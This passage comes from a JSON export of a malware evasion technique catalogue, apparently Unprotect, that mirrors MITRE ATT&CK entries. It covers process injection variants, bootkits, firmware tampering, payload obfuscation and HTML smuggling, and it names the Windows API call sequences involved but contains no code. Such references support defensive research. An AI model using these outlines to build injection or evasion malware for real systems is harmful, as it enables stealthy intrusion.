"unprotect_id": "T1055.004",
"name": "Process Injection: Asynchronous Procedure Call",
"description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nAPC injection is commonly performed by attaching malicious code to the APC Queue of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL).\r\n\r\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. AtomBombing is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/004/",
"creation_date": "2023-02-24T03:30:19.124000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nasynchronous procedure call (APC) queue,\r\nevade process-based defenses,\r\nprivilege elevation,\r\nmimic legitimate process,\r\nAPC injection,\r\nOpenThread,\r\nQueueUserAPC,\r\nLoadLibrayA,\r\nEarly Bird injection,\r\nAtomBombing,\r\nmalicious code injection,",
"modification_date": "2023-10-04T10:44:29.416000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 304,
"key": "process-injection-thread-execution-hijacking",
"unprotect_id": "T1055.003",
"name": "Process Injection: Thread Execution Hijacking",
"description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.\r\n\r\nThis is very similar to Process Hollowing but targets an existing process rather than creating a process in a suspended state.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/003/",
"creation_date": "2023-02-24T03:21:21.181000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nevade process-based defenses,\r\nOpenThread,\r\nSuspendThread,\r\nVirtualAllocEx,\r\nWriteProcessMemory,\r\nSetThreadContext, \r\nResumeThread,\r\nexisting process,\r\nmimic legitimate process,",
"modification_date": "2023-10-04T10:42:44.290000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 303,
"key": "process-injection-portable-executable-injection",
"unprotect_id": "T1055.002",
"name": "Process Injection: Portable Executable Injection",
"description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. \r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/002/",
"creation_date": "2023-02-16T00:25:09.855000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nexecuting arbitrary code in live process,\r\nvirtual address space,\r\nVirtualAllocEx,\r\nWriteProcessMemory,\r\nCreateRemoteThread,",
"modification_date": "2023-10-04T10:44:16.090000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 302,
"key": "process-injection-dynamic-link-library-injection",
"unprotect_id": "T1055.001",
"name": "Process Injection: Dynamic-link Library Injection",
"description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). \r\n\r\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).\r\n\r\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process. This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1055/001/",
"creation_date": "2023-02-16T00:21:00.773000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nexecuting arbitrary code in live process,\r\nnative Windows API calls,\r\nVirtualAllocEx, \r\nWriteProcessMemory,\r\nCreateRemoteThread,\r\nLoadLibrary,\r\nreflective DLL injection,\r\nself-mapping DLL,\r\nModule Stomping,\r\nModule Overloading,\r\nDLL Hollowing,\r\nconceal injected code,\r\nAddressOfEntryPoint,\r\nmalicious injection,\r\nencrypted DLLs,",
"modification_date": "2023-10-04T10:44:15.834000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 301,
"key": "pre-os-boot-bootkit",
"unprotect_id": "T1542.003",
"name": "Pre-OS Boot: Bootkit",
"description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\r\n\r\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. \r\n\r\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1542/003/",
"creation_date": "2023-02-16T00:02:44.948000Z",
"tags": "Persistence, \r\nDefense Evasion,\r\nboot sector modification,\r\nMaster Boot Record (MBR),\r\nVolume Boot Record (VBR),\r\nboot loader,\r\nboot drive overwrite,\r\nAPT28,\r\nAPT41,\r\nransomware,",
"modification_date": "2023-10-04T10:42:43.557000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 300,
"key": "pre-os-boot-component-firmware",
"unprotect_id": "T1542.002",
"name": "Pre-OS Boot: Component Firmware",
"description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\r\n\r\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1542/002/",
"creation_date": "2023-02-15T23:58:24.350000Z",
"tags": "Persistence, \r\nDefense Evasion,\r\nmodify component firmware,\r\nexecute adversary code,\r\npatching legitimate device firmware,\r\noverwrite firmware,",
"modification_date": "2023-10-04T10:44:15.571000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 299,
"key": "pre-os-boot-system-firmware",
"unprotect_id": "T1542.001",
"name": "Pre-OS Boot: System Firmware",
"description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.\r\n\r\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1542/001/",
"creation_date": "2023-02-15T23:41:24.674000Z",
"tags": "Persistence, \r\nDefense Evasion,\r\nBIOS (Basic Input/Output System),\r\nUnified Extensible Firmware Interface (UEFI),\r\nExtensible Firmware Interface (EFI),\r\noverwrite system firmware,\r\nmalicious firmware updates,\r\nrootkit,\r\nBIOS modification,",
"modification_date": "2023-10-04T10:44:06.969000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 298,
"key": "obfuscated-files-or-information-embedded-payloads",
"unprotect_id": "T1027.009",
"name": "Obfuscated Files or Information: Embedded Payloads",
"description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to Subvert Trust Controls by not impacting execution controls such as digital signatures and notarization tickets.\r\n\r\nAdversaries may embed payloads in various file formats to hide payloads. This is similar to Steganography, though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.\r\n\r\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary. Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.\r\n\r\nEmbedded content may also be used as Process Injection payloads used to infect benign system processes. These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1027/009/",
"creation_date": "2023-02-15T23:33:22.130000Z",
"tags": "Defense Evasion,\r\nconceal malicious code,\r\nobfuscate malicious payloads,\r\nSubvert Trust Controls,\r\nembedded payloads,\r\nnested payloads,\r\nProcess Injection payloads,\r\nencrypted communications module,",
"modification_date": "2023-10-04T10:42:36.663000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 297,
"key": "obfuscated-files-or-information-stripped-payloads",
"unprotect_id": "T1027.008",
"name": "Obfuscated Files or Information: Stripped Payloads",
"description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s linker when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.\r\n\r\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1027/008/",
"creation_date": "2023-02-15T23:22:37.393000Z",
"tags": "Defense Evasion,\r\nRemove human readable information,\r\noperating system linker,\r\nobfuscate malicious code,",
"modification_date": "2023-10-04T10:42:32.815000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 296,
"key": "obfuscated-files-or-information-dynamic-api-resolution",
"unprotect_id": "T1027.007",
"name": "Obfuscated Files or Information: Dynamic API Resolution",
"description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various Native API functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\r\n\r\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.\r\n\r\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to Software Packing, dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\r\n\r\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as GetProcAddress() and LoadLibrary(). These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of Deobfuscate/Decode Files or Information during execution)",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1027/007/",
"creation_date": "2023-02-15T23:19:52.827000Z",
"tags": "Defense Evasion,\r\nobfuscate API functions,\r\ndynamic API resolution,\r\nconceal malicious functionality,\r\nimport address table (IAT),\r\nmanipulate file signatures,\r\nGetProcAddress(),\r\nLoadLibrary(),\r\nEncrypt hashes,\r\nDeobfuscate files,\r\nDecode files,\r\ndynamic Windows hashing algorithm,",
"modification_date": "2023-10-04T10:42:41.519000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 295,
"key": "obfuscated-files-or-information-html-smuggling",
"unprotect_id": "T1027.006",
"name": "Obfuscated Files or Information: HTML Smuggling",
"description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.\r\n\r\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. Deobfuscate/Decode Files or Information), potentially bypassing content filters.\r\n\r\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1027/006/",
"creation_date": "2023-02-15T23:15:42.900000Z",
"tags": "Defense Evasion,\r\nbypass content filters,\r\nmalicious HTML files,\r\nMIME files,\r\nHTML5 download attribute,\r\nJavaScript Blobs,\r\ntext/plain, \r\ntext/html,\r\nData URLs,\r\nmsSaveBlob,\r\nAPT29,",
"modification_date": "2023-10-04T10:44:14.626000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
}
]
}
